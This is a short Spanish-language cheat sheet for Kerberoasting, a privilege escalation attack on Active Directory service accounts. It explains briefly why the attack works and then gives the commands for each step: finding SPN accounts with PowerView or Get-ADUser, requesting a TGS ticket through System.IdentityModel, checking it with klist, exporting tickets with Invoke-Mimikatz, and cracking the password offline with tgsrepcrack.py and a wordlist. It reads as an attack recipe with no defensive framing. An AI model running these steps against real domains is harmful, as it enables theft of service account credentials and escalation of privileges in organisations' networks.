PE - Kerberoast

Escalada de Privilegios a través de Kerberoasting

• Cracking offline de contraseñas de cuentas de servicio.

• El ticket de sesión de Kerberos (TGS) tiene una parte de servidor que está cifrada con el hash de la contraseña de la cuenta de servicio. Esto hace posible solicitar un ticket y hacer un ataque de contraseña sin conexión.

• Las cuentas de servicio son muchas veces ignoradas (las contraseñas rara vez se cambian) y tienen acceso privilegiado.

• Los hashes de las contraseñas de las cuentas de servicio pueden ser utilizados para crear tickets Silver.

• Encuentre las cuentas de usuario utilizadas como cuentas de servicio:

• PowerView

Get-NetUser –SPN

• Con el módulo de ActiveDirectory

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

• Petición a TGS

Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/domain.local"

• Request-SPNTicket de PowerView puede ser usado también para crackear con John o Hashcat.

• Comprobar si se ha concedido el TGS

klist

• Exportar todos los tickets usando Mimikatz

Invoke-Mimikatz -Command '"kerberos::list /export"'

• Crackear la contraseña de Service account

python.exe .\\tgsrepcrack.py .\\10k-worst-pass.txt .\\[email protected] DOMAIN.LOCAL.kirbi